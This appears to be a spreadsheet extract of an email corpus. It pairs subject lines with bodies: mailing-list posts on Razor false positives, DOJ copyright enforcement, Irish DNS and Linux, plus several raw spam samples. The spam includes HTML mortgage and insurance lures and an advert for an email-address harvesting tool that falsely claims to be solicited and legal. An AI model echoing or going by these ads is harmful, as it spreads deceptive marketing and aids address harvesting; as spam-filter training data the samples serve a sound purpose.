 =D1=A7=D0=A3=B8=D6=D3=A1=BD=E1=D2=B5=D6=A4=CA=E9=A3=AC=CD=A8=B9=FD=BF=BC=CA=D4=
 =BA=F3=BF=C9=C9=EA=C7=EBMBA=D1=A7=CE=BB=D6=A4=CA=E9
 =A1=F4=CA=B5=D0=D0=B6=E0=D6=D6=B6=D4=BD=D3=B7=BD=CA=BD=A3=BA
 =A3=A81=A3=A9=CB=B6=CA=BF=BD=F8=D0=DE=B0=E0=B5=C4=D1=A7=D4=B1=A3=AC=B7=FB=BA=
 =CF=CC=F5=BC=FE=D5=DF=BF=C9=B2=CE=BC=D3=C9=EA=C7=EB=CB=B6=CA=BF=D1=A7=CE=BB=BF=
 =BC=CA=D4=A3=BB
 =A3=A82=A3=A9=B7=FB=BA=CF=CC=F5=BC=FE=D5=DF=BF=C9=B2=CE=BC=D3MBA=B5=A5=D6=A4=
 =C1=AA=BF=BC=BA=CDMBA=CB=AB=D6=A4=C1=AA=BF=BC=A3=BB
 =A3=A83=A3=A9=CD=C6=BC=F6=B7=FB=BA=CF=CC=F5=BC=FE=D5=DF=BD=F8=C8=EB=C3=C0=B9=
 =FA=D3=D0=B9=D8=B4=F3=D1=A7=BD=F8=D0=DE=D1=A7=CF=B0=B2=A2=C8=A1=B5=C3=CB=B6=CA=
 =BF=D1=A7=CE=BB=A1=A3
 7=A1=A2=D1=A7=B7=D1=A3=BA
 =A1=F4=D1=A7=B7=D1=C3=BF=C8=CB15000=D4=AA=A3=BB
 =A1=F4=BD=CC=B2=C4=B7=D1=A1=A2=D7=CA=C1=CF=B7=D1=C3=BF=C8=CB1000=D4=AA=C1=ED=
 =CA=D5=A3=BB
 =A1=F4=B1=A8=C3=FB=B7=D1=C3=BF=C8=CB100=D4=AA=A1=A3
 8=A1=A2=C9=CF=BF=CE=B5=D8=B5=E3=A3=BA=B9=E3=D6=DD
 9=A1=A2=BC=A4=C0=F8=B4=EB=CA=A9=A3=BA
 =A3=A81=A3=A9
 =B9=E3=B6=AB=B5=D8=C7=F8=CA=D5=B7=D1=D7=EE=B5=CD=A3=BB
 =A3=A82=A3=A9
 =B7=B2=C8=AB=B9=FA=BF=BC=CA=D4=B4=EF=CF=DF=D5=DF=D3=C5=CF=C8=C2=BC=C8=A1=A3=BB=
 =A3=A83=A3=A9
 =B6=D4MBA=D1=A7=D4=B1=B7=A2=B1=ED=C2=DB=CE=C4=D3=E8=D2=D4=BD=B1=C0=F8=A3=BB
 =A3=A84=A3=A9 =D7=CA=D6=FAMBA=D1=A7=D4=B1=B2=CE=BC=D3=D0=A3=C4=DA=CD=E2=BB=EE=
 =B6=AF=A3=AC=B6=D4=B2=CE=BC=D3=B9=FA=BC=CA=C6=F3=D2=B5=B9=DC=C0=ED=CC=F4=D5=BD=
 =BA=AE=BD=F8=C8=EB=BE=BA=C8=FC=BB=F2=BB=F1=B5=C3=C3=FB        =B4=CE=B5=C4=
 MBA=D1=A7=C9=FA=D3=E8=D2=D4=D6=D8=BD=B1=A1=A3
 10=A1=A2=B6=C0=CC=D8=D3=C5=CA=C6=A3=BA
   =A1=F4=C6=FB=B3=B5=A1=A2=BD=BB=CD=A8=D0=D0=D2=B5=CE=A8=D2=BB=B8=DF=BC=B6=B9=
 =DC=C0=ED=C8=CB=D4=B1=C5=E0=D1=B5=BB=FA=B9=B9=A3=BB
   =A1=F4=D0=D0=D2=B5=C8=A8=CD=FE=D7=A8=BC=D2=CE=AA=C6=F3=D2=B5=CC=E1=B9=A9=B9=
 =CB=CE=CA=D0=D4=C5=E0=D1=B5=B7=FE=CE=F1=A3=AC=CE=AA=C6=F3=D2=B5=B7=A2=D5=B9=B3=
 =F6=C4=B1=BB=AE=B2=DF=A3=BB
   =A1=F4=B6=E0=D6=D6=B6=D4=BD=D3=B7=BD=CA=BD=A3=AC=D3=D0=D6=FA=D1=A7=D4=B1=C8=
 =A1=B5=C3=B9=FA=BC=D2=A1=A2=B9=FA=BC=CA=B3=D0=C8=CF=B5=C4=D1=A7=CE=BB=D6=A4=CA=
 =E9=A1=A3
 11=A1=A2=B1=A8=C3=FB=D7=E9=D6=AF=A3=BA
   =A1=F4=D6=F7=B0=EC=B5=A5=CE=BB=A3=BA=CE=E4=BA=BA=C0=ED=B9=A4=B4=F3=D1=A7=A3=
 =A8=D4=AD=D6=D0=B9=FA=C6=FB=B3=B5=B9=A4=D2=B5=D7=DC=B9=AB=CB=BE=D6=D8=B5=E3=B4=
 =F3=D1=A7=CE=E4=BA=BA=C6=FB=B3=B5=B9=A4=D2=B5=B4=F3=D1=A7=A1=A2              =
 =CE=E4=BA=BA=B9=A4=D2=B5=B4=F3=D1=A7=A1=A2=CE=E4=BA=BA=BD=BB=CD=A8=BF=C6=BC=BC=
 =B4=F3=D1=A7=A3=A9
   =A1=F4=D7=C9=D1=AF=B7=BD=CA=BD=A3=BA
     =A3=A81=A3=A9=B9=E3=D6=DDTEL=A3=BA020-87515870/87577289     FAX=A3=BA=
 020-87515015
          =C1=AA=CF=B5=C8=CB=A3=BA=D5=C5=C0=CF=CA=A6=A1=A2=D0=DC=C0=CF=CA=A6
     =A3=A82=A3=A9=CE=E4=BA=BATEL=A3=BA027-87859039              FAX=A3=BA=
 027-87859231
          =C1=AA=CF=B5=C8=CB=A3=BA=B4=F7=C0=CF=CA=A6=A1=A2=CE=E2=C0=CF=CA=A6
   =A1=F4=CD=A8=D1=B6=B5=D8=D6=B7=A3=BA=B9=E3=D6=DD=CA=D0=CC=EC=BA=D3=C7=F8=CC=
 =E5=D3=FD=B6=AB=C2=B733=BA=C5=A3=A8=CC=EC=CA=A2=B4=F3=CF=C3=C4=CF=CB=FE=A3=A9=
 804=CA=D2
              =A3=A8=D3=CA=B1=E0=A3=BA510635=A3=A9
   =A1=F4=B1=A8=C3=FB=CA=D6=D0=F8=A3=BA
     =A3=A81=A3=A9=CC=E1=BD=BB=B8=F6=C8=CB=BC=F2=C0=FA=A1=A2=D1=A7=C0=FA=BB=F2=
 =D1=A7=CE=BB=D6=A4=CA=E9=B8=B4=D3=A1=BC=FE=B8=F71=B7=DD=A3=BB
     =A3=A82=A3=A9=B3=F5=C9=F3=BA=CF=B8=F1=BA=F3=A3=AC=CC=E1=BD=BB=B1=A8=C3=FB=
 =B1=ED=A3=BB
     =A3=A83=A3=A9=B8=B4=C9=F3=BA=CF=B8=F1=BA=F3=A3=AC=BC=C4=B7=A2=C8=EB=D1=A7=
 =CD=A8=D6=AA=CA=E9=A3=BB
     =A3=A84=A3=A9=CA=D5=B5=BD=C8=EB=D1=A7=CD=A8=D6=AA=CA=E9=BA=F3=A3=AC=D1=A7=
 =D4=B1=BC=A4=C4=C9=D1=A7=B7=D1=BC=B0=CA=E9=B1=BE=B7=D1=A1=A3=B7=BD=CA=BD=D3=D0=
 =BB=E3=BF=EE=D3=EB=CF=D6=BD=F0=C1=BD=D6=D6=A1=A3
     =A3=A85=A3=A9=D1=A7=D4=B1=BD=C9=B7=D1=BA=F3=A3=AC=C1=EC=C8=A1=BF=CE=B3=CC=
 =B1=ED=BA=CD=BD=CC=B2=C4=D7=CA=C1=CF=A1=A3
     =A3=A86=A3=A9=B1=A8=C3=FB=BD=D8=D6=B9=CA=B1=BC=E4=A3=BA2002=C4=EA5=D4=C2
     =A3=A87=A3=A9=BF=AA=BF=CE=CA=B1=BC=E4=A3=BA=B5=DA=D2=BB=B4=CE=C3=E6=CA=DA=
 =CA=B1=BC=E4=CE=AA2002=C4=EA6=D4=C2=A1=A3
 --d51589f6-64c8-11d6-b6fa-0050ba415022--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: 1987 copy of Nintendo zine going for $700 on eBay
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85535421
 Date: Not supplied
 A Nintendo newsletter from 1987 is going for ober $700 on eBay. Link[1] Discuss
 [2] _(Thanks, Billy Hayes!)_
 [1] http://cgi.ebay.com/ws/eBayISAPI.dll?ViewItem&amp;item=1566539449&amp;rd=1
 [2] http://www.quicktopic.com/16/H/wUzqZdX42Az
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: &gt;&gt; Best rates on mortgage in the country! &lt;
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;HTML&gt;&lt;HEAD&gt;
 &lt;META http-equiv=3DContent-Type content=3D"text/html; charset=3Diso-8859-1=
 "&gt;
 &lt;/HEAD&gt;
 &lt;BODY&gt;
 &lt;TABLE height=3D400 cellSpacing=3D0 cellPadding=3D0 width=3D450 align=3Dce=
 nter border=3D0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD colSpan=3D2&gt;&lt;A href=3D"http://61.129.68.19/user0201/index.asp?Afft=
 =3DQM6"&gt;&lt;IMG height=3D38 src=3D"http://61.129.68.17/mortgage/h1.gif" width=
 =3D450 border=3D0&gt;&lt;/A&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD width=3D138 height=3D178&gt;&lt;A href=3D"http://61.129.68.19/user0201/i=
 ndex.asp?Afft=3DQM6"&gt;&lt;IMG height=3D178 src=3D"http://61.129.68.17/mortgage=
 /bullets.gif" width=3D138 border=3D0&gt;&lt;/A&gt;&lt;/TD&gt;
     &lt;TD width=3D312 height=3D178&gt;&lt;A href=3D"http://61.129.68.19/user0201/i=
 ndex.asp?Afft=3DQM6"&gt;&lt;IMG height=3D178 src=3D"http://61.129.68.17/mortgage=
 /family.jpg" width=3D312 border=3D0&gt;&lt;/A&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD width=3D450 colSpan=3D2 height=3D20&gt;&lt;A href=3D"http://61.129.68.19=
 /user0201/index.asp?Afft=3DQM6"&gt;&lt;IMG height=3D20 src=3D"http://61.129.68.1=
 7/mortgage/bb.gif" width=3D450 border=3D0&gt;&lt;/A&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD width=3D450 colSpan=3D2 height=3D118&gt;&lt;A href=3D"http://61.129.68.1=
 9/user0201/index.asp?Afft=3DQM6"&gt;&lt;IMG height=3D118 src=3D"http://61.129.68=
 17/mortgage/text.gif" width=3D450 border=3D0&gt;&lt;/A&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD width=3D450 colSpan=3D2 height=3D46&gt;&lt;A href=3D"http://61.129.68.19=
 /user0201/index.asp?Afft=3DQM6"&gt;&lt;IMG height=3D46 src=3D"http://61.129.68.1=
 7/mortgage/clickhere.gif" width=3D450 border=3D0&gt;&lt;/A&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/T=
 ABLE&gt;&lt;BR&gt;&lt;BR&gt;
 &lt;TABLE width=3D450 align=3Dcenter&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD align=3Dmiddle&gt;&lt;FONT face=3DArial,Helvetica color=3D#000000 size=3D=
 1&gt;=FFFFFFA9 
       Copyright 2002 - All rights reserved&lt;BR&gt;&lt;BR&gt;If you would no longer l=
 ike us 
       to contact you or feel that you have&lt;BR&gt;received this email in error=
 , 
       please &lt;A href=3D"http://61.129.68.19/light/watch.asp"&gt;click here to=
       unsubscribe&lt;/A&gt;.&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/DIV&gt;&lt;/BODY&gt;&lt;/HTML&gt;
 rvacyp5et57mqkysfellajuu6zz9qyynqe5syfk5ew0rhqcyrd1qz80lheklem47idcz
 &lt;/BODY&gt;
 &lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Razor-users] Trivial false-positives
</t>
  </si>
  <si>
    <t xml:space="preserve">
 It seems that an email consisting of a single line containg a
 control-M is detected as spam. 
 It also seems that an email consisting of 5 blank lines is also
 treated as spam:
 efes:~% rm -f qq
 efes:~% perl -e 'for($i = 0; $i &lt; 5; $i++) { print "\n"; }' &gt;&gt; qq
 efes:~% razor-check -d qq &gt; /tmp/bar
 efes:~% grep 'known spam' /tmp/bar
 Aug 05 16:07:20.141526 check[31105]: [ 3] mail 1 is known spam.
 I'm running Razor-agents 2.14.
 These examples are based on real-life false-positives found by my
 users. One of the reals emails was sent by a user which wrote the 
 real contents of the email in the Subject field.
 I thought the newer Razor-releases avoided these problems.
      -- Michael Glad, email: glad@daimi.au.dk
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: The GOv gets tough on Net Users.....er Pirates..
</t>
  </si>
  <si>
    <t xml:space="preserve">from http://www.arstechnica.com/
 "There has mostly been talk thus far and little action, but the Department
 of Justice says it may be ready to file criminal lawsuits against
 individuals [1] who distribute or receive unauthorized copyrighted
 material over the Internet. Deputy Assistant Attorney General John Malcolm believes
 that "criminal prosecutions of copyright offenders are now necessary to
 preserve the viability of America's content industries." Malcolm also
 believes that people who trade copyrighted material think they are
 participating in a legal activity. I certainly think people who download
 copyrighted works understand that such distribution--barring provisions
 such as fair use--is not authorized, and it is not surprising to see
 businesses continue to look for means to discourage distribution of
 copyrighted works.
 "Some prosecutions that make that clear could be very helpful...I think
 they would think twice if they thought there was a risk of criminal
 prosecution," said [RIAA President Cary] Sherman, who was on the same
 conference panel.
 I'm not too confident that lawsuits would have the effect Sherman is
 hoping for. Although infrequent, there have already been civil suits or
 warnings issued to private individuals, and they have served as minor
 deterrents to the file-sharing community at large. Criminal lawsuits
 carrying with them the possibility of prison sentences may generate
 further animosity against groups such as the RIAA and may be difficult to
 initiate because of the "schooling" effect of millions of systems
 participating in file sharing. Only servers would seem to stand out from
 the crowd.
 The article cites the No Electronic Theft (NET) Act [2], which defines
 illegal  activity and maximum penalties for copyright infringement:
 Criminal infringement: Any person who infringes a copyright willfully for
 purposes of commercial advantage or private financial gain, or by the
 reproduction or distribution, including by electronic means, during any
 180-day period, of 1 or more copies or phonorecords of 1 or more
 copyrighted works, which have a total retail value of more than $1,000....
 For purposes of this subsection, evidence of reproduction or distribution
 of a copyrighted work, by itself, shall not be sufficient to establish
 willful infringement.
 ...
 The term "financial gain" includes receipt, or expectation of receipt, of
 anything of value, including the receipt of other copyrighted works.
 Therefore, receipt of a work of value would be defined as "financial gain"
 even if no money is involved. The NET Act excerpt does not clarify how the
 value of a work is determined; an album or movie could be worth only $15
 to millions of dollars depending on whether the value is assessed from the
 perspective of the consumer or copyright holder.
 The statute of limitations:
 507. Limitations on actions
 (a) Criminal Proceedings.--No criminal proceeding shall be maintained
 under the provisions of this title unless it is commenced within five
 years after the cause of action arose.
 (b) Civil Actions.--No civil action shall be maintained under the
 provisions of this title unless it is commenced within three years after
 the claim accrued.
 The penalties are too extensive to list here, but they can be found in
 Section 2319: Criminal infringement of a copyright. In general, first-time
 criminal offenses will carry a maximum prison sentence of 1 year.
 I'm still not sure where the DOJ would start in choosing people to
 prosecute because of the aforementioned "schooling" effect, but my guess
 would be that, just like speeding, primarily the most prominent
 individuals who operate large servers or transfer the most data will be
 targeted in order to discourage more recreational file sharers. Thanks to
 MonaLisaOverdrive for pointing out this story.
 "
 [1] http://news.com.com/2100-1023-954591.html?tag=fd_top
 [2] http://www.usdoj.gov/criminal/cybercrime/17-18red.htm
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Photoshop a kid getting his tounge measured
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8388720,1717/
 Date: 2002-09-30T10:08:10+01:00
 (Some Game Boy)
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Harvest lots of E-mail addresses quickly !
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear fork =2C
 =3CBODY bgColor=3D#ffccff=3E
 =3CTABLE border=3D0 cellPadding=3D0 cellSpacing=3D0 width=3D475=3E
   =3CTBODY=3E
   =3CTR=3E
     =3CTD align=3Dmiddle vAlign=3Dtop=3E=3C=2FTD=3E=3C=2FTR=3E=3C=2FTBODY=3E=3C=2FTABLE=3E=3CBR=3E
 =3CTABLE=3E
   =3CTBODY=3E
   =3CTR=3E
     =3CTD width=3D=225%=22=3E=3C=2FTD=3E
     =3CTD bgColor=3D#b8ecff borderColor=3D#0000ff width=3D=2290%=22=3E=3CFONT color=3D#ff0000 
       face=3D=22Arial Black=22 
       size=3D6=3E&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B Want   
       To Harvest A Lot Of Email&amp;nbsp=3B&amp;nbsp=3B Addresses In A Very Short Time=3F=3C=2FFONT=3E   
       =3CP=3E=3CB=3E=3CFONT color=3D#0000ff face=3DArial size=3D4=3EEasy Email   
       Searcher=3C=2FFONT=3E=3CFONT color=3D#ff00ff face=3DArial size=3D4=3E&amp;nbsp=3B is&amp;nbsp=3B   
       a&amp;nbsp=3B powerful&amp;nbsp=3B Email&amp;nbsp=3B software&amp;nbsp=3B&amp;nbsp=3B that&amp;nbsp=3B   
       harvests general Email lists from mail servers&amp;nbsp=3B&amp;nbsp=3B =3C=2FFONT=3E=3CFONT   
       color=3D#0000ff face=3DArial size=3D4=3EEasy Email Searcher =3C=2FFONT=3E=3CFONT   
       color=3D#ff00ff face=3DArial size=3D4=3Ecan get 100=2C000 Email=3C=2FFONT=3E=3C=2FB=3E =3CFONT   
       color=3D#ff00ff face=3DArial size=3D4=3E=3CB=3Eaddresses directly from the Email   
       servers in only one hour!&amp;nbsp=3B=3C=2FB=3E=3C=2FFONT=3E=3C=2FP=3E  
       =3CUL=3E  
         =3CLI=3E=3CFONT face=3DArial size=3D2=3E=3CB=3E=3CFONT color=3D#0000ff=3EEasy Email   
         Searcher=3C=2FFONT=3E=3C=2FB=3E is a 32 bit Windows Program for e-mail marketing=2E It   
         is intended for easy and convenient search large e-mail address lists   
         from mail servers=2E The program can be operated on Windows 95=2F98=2FME=2F2000   
         and NT=2E=3C=2FFONT=3E   
         =3CLI=3E=3CFONT face=3DArial size=3D2=3E=3CB=3E=3CFONT color=3D#0000ff=3EEasy Email   
         Searcher=3C=2FFONT=3E =3C=2FB=3Esupport multi-threads =28up to 512   
         connections=29=2E=3C=2FFONT=3E   
         =3CLI=3E=3CFONT face=3DArial size=3D2=3E=3CB=3E=3CFONT color=3D#0000ff=3EEasy Email   
         Searcher=3C=2FFONT=3E=3C=2FB=3E has the ability&amp;nbsp=3B to reconnect to the mail   
         server if the server has disconnected and continue the searching at the   
         point where it has been interrupted=2E=3C=2FFONT=3E   
         =3CLI=3E=3CFONT face=3DArial size=3D2=3E=3CB=3E=3CFONT color=3D#0000ff=3EEasy Email   
         Searcher=3C=2FFONT=3E=3C=2FB=3E has an ergonomic interface that is easy to set up   
         and simple to use=2E=3C=2FFONT=3E =3C=2FLI=3E=3C=2FUL=3E  
       =3CP=3E=A1=A1=3CB=3E=3CFONT color=3D#0000ff face=3DArial=3EEasy Email Searcher is an email   
       address searcher and bulk e-mail sender=2E It can verify more than 5500   
       email addresses per minute at only 56Kbps speed=2E It even allows you send   
       email to valid email address while searching=2E You can save the searching   
       progress and load it to resume work at your convenience=2E All you need to   
       do is just input an email address=2C and press the =22Search=22   
       button=2E=3C=2FFONT=3E=3C=2FB=3E=3C=2FP=3E  
       =3CP=3E=3CB=3E=3CFONT color=3D#0000ff face=3DArial=3E=3CBR=3E=3C=2FFONT=3E=3Cfont face=3D=22Comic Sans MS=22 size=3D=224=22 color=3D=22#FF00FF=22=3EVery 
       Low Price ! -------&amp;nbsp=3B Now=2C&amp;nbsp=3B The full version of Easy Email 
       Searcher only costs =3C=2Ffont=3E=3Cfont face=3D=22Comic Sans MS=22 size=3D=224=22 color=3D=22#0000FF=22=3E$ 
       39=2E 95=3C=2Ffont=3E=3C=2FB=3E=3C=2FP=3E 
       =3CP=3E=3CB=3E=3CFONT color=3D#ff0000 face=3DArial size=3D4=3E=3CI=3EClick The Following Link To   
       Download The Demo =3A=3C=2FI=3E=3C=2FFONT=3E=3C=2FB=3E=3C=2FP=3E 
       =3CP=3E=3CB=3E=3CFONT color=3D#ff0000 face=3DArial size=3D4=3E=3CA  
       href=3D=22http=3A=2F=2Fwww=2Ewldinfo=2Ecom=2Fdownload=2Femail=2Fnewees=2Ezip=22=3EDownload Site   
       1=3C=2FA=3E=3C=2FFONT=3E=3C=2FB=3E=3C=2FP=3E  
       =3CP=3E=3CB=3E=3CFONT color=3D#ff0000 face=3DArial size=3D4=3E=3CA   
       href=3D=22http=3A=2F=2Fbestsoft=2E3322=2Eorg=2Fonlinedown=2Fnewees=2Ezip=22=3EDownload Site   
       2=3C=2FA=3E&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B&amp;nbsp=3B =3C=2FFONT=3E=3C=2FB=3E=A1=A1=3CFONT color=3D#0000a0 face=3DArial 
       size=3D3=3E=3CSTRONG=3EIf&amp;nbsp=3B you can not download this program =2C&amp;nbsp=3B please   
       copy the following link into your URL =2C and then click =22 Enter=22 on your   
       Computer Keyboard=2E=3C=2FSTRONG=3E=3C=2FFONT=3E=3C=2FP=3E  
       =3CP=3E=3CFONT size=3D2=3E=3CFONT color=3D#0000a0 face=3DArial size=3D3=3E=3CSTRONG=3EHere is the   
       download links=3A=3C=2FSTRONG=3E=3C=2FFONT=3E=3C=2FP=3E  
       =3CDIV=3E  
       =3CP=3Ehttp=3A=2F=2Fwww=2Ewldinfo=2Ecom=2Fdownload=2Femail=2Fnewees=2Ezip=3C=2FP=3E  
       =3CP=3Ehttp=3A=2F=2Fbestsoft=2E3322=2Eorg=2Fonlinedown=2Fnewees=2Ezip=3C=2FP=3E=3C=2FFONT=3E=3C=2FDIV=3E  
       =3CP=3E=3C=2FP=3E=3C=2FTD=3E  
     =3CTD width=3D=225%=22=3E=3C=2FTD=3E=3C=2FTR=3E  
   =3CTR=3E  
     =3CTD width=3D=225%=22=3E=3C=2FTD=3E  
     =3CTD bgColor=3D#0f95de width=3D=2290%=22=3E=3CFONT color=3D#ffffff   
       face=3D=22Verdana=2C Tahoma=2C Helvetica=2C SansSerif=22   
       size=3D1=3E=3CB=3EDisclaimer=3A=3C=2FB=3E=3CBR=3EWe are strongly against continuously sending   
       unsolicited emails to those who do not wish to receive our special   
       mailings=2E We have attained the services of an independent 3rd party to   
       overlook list management and removal services=2E This is not unsolicited   
       email=2E If you do not wish to receive further mailings=2C please click this   
       link =3CA href=3D=22 mailto=3Aremoval=40btamail=2Enet=2Ecn =22   
       target=3D=5Fblank=3E=3CFONT   
       color=3D#fdd32a=3E=3CB=3Emailto=3Aremoval=40btamail=2Enet=2Ecn  
       =3C=2FB=3E=3C=2FFONT=3E=3C=2FA=3E=2E&amp;nbsp=3B=3C=2FFONT=3E=3CB=3E=3CFONT class=3Ddisclaimer color=3D#000080  
       face=3DArial=3E=3CBR=3EThis message is a commercial advertisement=2E It is compliant  
       with all federal and state laws regarding email messages including the  
       California Business and Professions Code=2E We have provided the subject  
       line =22ADV=22 to provide you notification that this is a commercial  
       advertisement for persons over 18yrs old=2E=3C=2FFONT=3E=3C=2FB=3E=3C=2FTD=3E 
     =3CTD width=3D=225%=22=3E=3C=2FTD=3E=3C=2FTR=3E=3C=2FTBODY=3E=3C=2FTABLE=3E 
 =3CBR=3E
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,
 John McCormac &lt;jmcc@hackwatch.com&gt; wrote:
 &gt; Last week, when indexing stuff for WhoisIreland.com, I noticed that
 &gt; ns0.domainregistry.ie and banba.domainregistry.ie were out of synch by
 &gt; a few days. The other nameservers seemed to give a current SOA at that
 &gt; time. However the affected secondaries may have been using
 &gt; ns0.domainregistry.ie for axfr and propagated the error.
 I don't know what role ns0 plays in relation to the IE zone. It's
 certainly not involved in the regular resolution process. It may
 be involved in zone distribution as you suggest. IIRC (and I often
 don't) on Friday ns0 had a serial that none of the IE nameservers 
 shared. Unfortunately I don't have a record of that.
 &gt; This whole thing does seriously bring into question IEDR's decision to
 &gt; outsource the technical admininstration of .ie to a company that
 &gt; apparently does not even admin its own DNS. It is a nice story though -
 &gt; almost as good as the time that .ie disappeared for 8 hours in July
 &gt; 1998.
 ... and only you noticed :)
 [ Messages on the IEDR-FORUM list at the time don't support 
   your assertion ]
 As an aside, shortly after my note on Friday uucp-gw-1.pa.dec.com and
 uucp-gw-2.pa.dec.com stopped responding to DNS requests. So IE had
 two dead nameservers, four stuck a week in the past and three
 working correctly. Marvellous.
 ATB,
 james
 _______________________________________________
 IIU mailing list
 IIU@iiu.taint.org
 http://iiu.taint.org/mailman/listinfo/iiu
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG] 3c509 &amp; 2.4.19 problems - SUMMARY
</t>
  </si>
  <si>
    <t xml:space="preserve">Albert White - SUN Ireland wrote:
 &gt; Hi,
 &gt; 
 &gt; Thanks for the replies. It turns out that it was an IRQ conflict with an old 
 &gt; sound card.
 &gt; 
 &gt; Despite checking the BIOS and running the 3c509 setup utility on 
 &gt; http://www.scyld.com/diag, the 2.4 kernel still picked a card on IRQ 5 and 10.
 &gt; 
 &gt; It works fine now that the sound card is removed, but I'm still confused as to 
 &gt; why this worked in 2.2.18 but not 2.4.19, seems like a regression to me...
 I'm jumping in here since I'm just back on
 ILUG after quite a long break, anyway...
 Alan Cox was mentioning that he might have borked
 some PNP stuff lately. You could try 2.4.19-ac4
 to see if it helps.
 Pdraig.
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Now heavily medicated
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://diveintomark.org/archives/2002/09/23.html#now_heavily_medicated
 Date: 2002-09-23T16:11:02-05:00
 Trust me when I tell you that heavy medication and RDF do not mix. Here is a 
 list of things I intend to re-read once the fog lifts: 
 - _Phil Ringnalda_: Using FOAF relationships[1] and Just say no to Trackback in 
 index.html[2]. 
 - _Les Orchard_: Per-post comment RSS feed[3]. 
 - _Phil Wainewright_: The bare necessities of RSS[4] and What to do about RDF
 [5]. The beginning of an RSS 2.0 best practices document. 
 - _Jonathon Delacour_: Trying to score a goal[6]. &amp;#8220;As the best and the 
 brightest focus on the possibilities of FOAF, I turned my attention to 
 yesterday's news: RSS.&amp;#8221; No, RSS will always be today's news. Get it? 
 Today's newzzz... Never mind. 
 - Comments on Ben Hammersley's Friend of a Friend[7]. Various ways to link to a 
 FOAF file from an RSS feed. 
 - _Nicholas Chase_: The Web's future: XHTML 2.0[8]. We're losing backward 
 compatibility, isn't that great? Well, he seems to think so. 
 - mod_cc[9], a module for including copyright information in RDF documents such 
 as RSS 1.0 feeds, and, I hope, FOAF files. 
 - _Shelley Powers_: Who is your audience, and what are you trying to 
 accomplish?[10] Addressing the growing identity crisis on the RSS-DEV mailing 
 list[11]. Also the comments on Shelley's article[12]. 
 - _Ian Hickson_: Pingback 1.0[13]. &amp;#8220;The best thing about this idea is 
 that unlike similar schemes like TrackBack, it is totally transparent to both 
 users.&amp;#8221; 
 - New software helps in building of accessible web sites[14]. A press release 
 for a new edition of LIFT[15], which I have never used. 
 - Forget Mars bars, Twinkies now the deep-fried treat[16]. &amp;#8220;The secret to 
 making a deep-fried Twinkie, he says, is to place it in the fridge first to 
 give it more stability. He then rolls it in flour, covers it with batter ... 
 and plunks it into the oil.&amp;#8221; 
 [1]  http://philringnalda.com/archives/002324.php
 [2]  http://philringnalda.com/archives/002329.php
 [3]  http://www.decafbad.com/news_archives/000290.phtml
 [4]  http://howto.looselycoupled.com/blog/2002_09_15_dy.htm
 [5]  http://howto.looselycoupled.com/blog/2002_09_22_dy.htm#85480973
 [6]  http://weblog.delacour.net/archives/000707.html
 [7]  http://rss.benhammersley.com/archives/001387.html
 [8]  http://www-106.ibm.com/developerworks/library/wa-xhtml/?n-wa-9192
 [9]  http://web.resource.org/rss/1.0/modules/cc/
 [10] http://weblog.burningbird.net/archives/000541.php
 [11] http://groups.yahoo.com/group/rss-dev/
 [12] http://burningbird.net/cgi-bin/mt-comments.cgi?entry_id=541
 [13] http://ln.hixie.ch/?start=1032794857&amp;count=1
 [14] http://maccentral.macworld.com/news/0209/23.usable.php
 [15] http://www.usablenet.com/
 [16] http://www.globeandmail.com/servlet/ArticleNews/PEstory/TGAM/20020923/UFATTN/Headlines/headdex/headdexInternational_temp/13/13/22/
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: FREE Health Insurance Quotes
</t>
  </si>
  <si>
    <t xml:space="preserve">NEED Health Insurance? 
  In addition to featuring the largest selection of major medical 
 health plans from leading companies, our service also
 offers a wide selection of quality dental plans.  You can obtain 
 FREE instant quotes, side-by-side comparisons, the best available 
 prices, online applications, and a knowledgeable Customer Care 
 team to help you find the plan that is right for you.
 If you would like more information please email
 surefiremarketing@btamail.net.cn?subject=healthinsurance
 with "Send me health insurance info" in the body of the email
 ***************************************************************
 If you do not wish to correspond with us, reply to 
